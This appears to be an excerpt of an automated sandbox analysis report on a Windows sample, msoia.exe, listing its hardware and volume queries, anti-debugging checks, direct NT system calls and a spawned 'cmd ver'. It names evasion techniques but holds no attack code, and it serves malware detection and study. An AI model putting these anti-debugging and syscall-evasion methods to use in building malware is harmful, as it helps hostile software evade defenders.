      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Family, Manufacturer, Name, NumberOfLogicalProcessors, NumberOfCores, ProcessorID, Stepping, MaxClockSpeed FROM win32_Processor
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\msoia.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeHandle closed: DEADC0DE
      Source: C:\Users\user\Desktop\msoia.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess token adjusted: DebugJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\msoia.exeNtMapViewOfSection: Direct from: 0x1DC7C19Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x1EE4F0BJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtUnmapViewOfSection: Direct from: 0x1DA60BDJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtSetInformationProcess: Direct from: 0x20BCA39Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtClose: Direct from: 0x20846AF
      Source: C:\Users\user\Desktop\msoia.exeNtQueryInformationProcess: Direct from: 0x1DC9386Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x1DE16FBJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtSetInformationThread: Direct from: 0x1DDD8D6Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x204A369Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtQueryInformationProcess: Direct from: 0x233B8C9Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x205A5D3Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x21E0F2AJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x21E6A86Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x234DA85Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x204DB2DJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtQueryInformationProcess: Direct from: 0x1DB4570Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtQueryInformationProcess: Direct from: 0x1DB77FAJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Indirect: 0x1806AF4Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x1E0A3FFJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtQueryInformationProcess: Direct from: 0x1EF4C51Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtSetInformationThread: Direct from: 0x2129CB4Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeNtProtectVirtualMemory: Direct from: 0x1D5C0F2Jump to behavior
      Source: C:\Users\user\Desktop\msoia.exeProcess created: C:\Windows\System32\cmd.exe cmd verJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\msoia.exeQueries volume information: C:\ VolumeInformationJump to behavior
